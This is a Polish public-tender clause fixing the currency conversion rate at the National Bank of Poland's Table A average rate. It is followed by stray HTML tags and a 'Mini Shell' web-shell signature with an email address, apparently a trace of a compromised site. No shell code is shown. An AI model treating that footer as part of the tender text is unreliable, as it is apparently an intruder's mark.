Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs waluty publikowany przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) w dniu zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia                             o zamówieniu, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmie się średni kurs publikowany pierwszego dnia po dniu zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com